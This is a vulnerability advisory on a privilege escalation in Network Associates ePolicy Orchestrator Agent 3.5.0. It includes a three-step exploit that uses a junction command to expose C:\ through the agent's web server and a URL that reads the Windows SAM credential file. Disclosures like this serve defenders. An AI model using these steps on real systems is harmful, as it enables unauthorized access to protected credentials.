NAePolicy.txt

`Summary:  
Privilege escalation in Network Associates ePolicy Orchestrator Agent  
3.5.0 (patch 3) (http://www.nai.com/)  
  
Details:  
The ePolicy Orchestrator Agent web server (which runs on TCP port 8081  
by default and serves the McAfee Agent Activity Log) can be used to  
view files that exist on the same partition with LocalSystem level  
privileges. On a default windows installation the "C:\Documents and  
Settings\All Users\Application Data\Network Associates\Common  
Framework\Db" folder (which is created by the EPO agent and is the  
folder that serves as the web root for the McAfee Agent Activity Log)  
includes the NTFS permission Everyone/Full Control. By using the  
Junction tool (from SysInternals) available at  
http://www.sysinternals.com/utilities/junction.html one can create a  
subfolder in the EPO agent web root directory (as any user) that will  
allow any file on the same partition to be viewed with LocalSystem  
level privileges.  
  
Vulnerable Versions:  
Network Associates ePolicy Orchestrator Agent 3.5.0 (patch 3)  
  
Patches/Workarounds:  
The vendor was notified of the issue. There was no response.  
  
Exploits:  
  
1. Logon to a machine running the EPO agent as any user.  
  
2. Using the Juction tool type the following command:  
  
junction "C:\Documents and Settings\All Users\Application Data\Network  
Associates\Common Framework\Db\Test" C:\  
  
This creates the equivalent of a virtual folder in the web server root named  
Test that points to C:\  
  
3. Use Internet Explorer to view a restricted file such as:  
  
http://127.0.0.1:8081/Test/WINDOWS/repair/sam  
  
The contents of the restricted file will be displayed thanks to the  
LocalSystem account.  
  
Discovered by Reed Arvin reedarvin[at]gmail[dot]com  
(http://reedarvin.thearvins.com/)  
`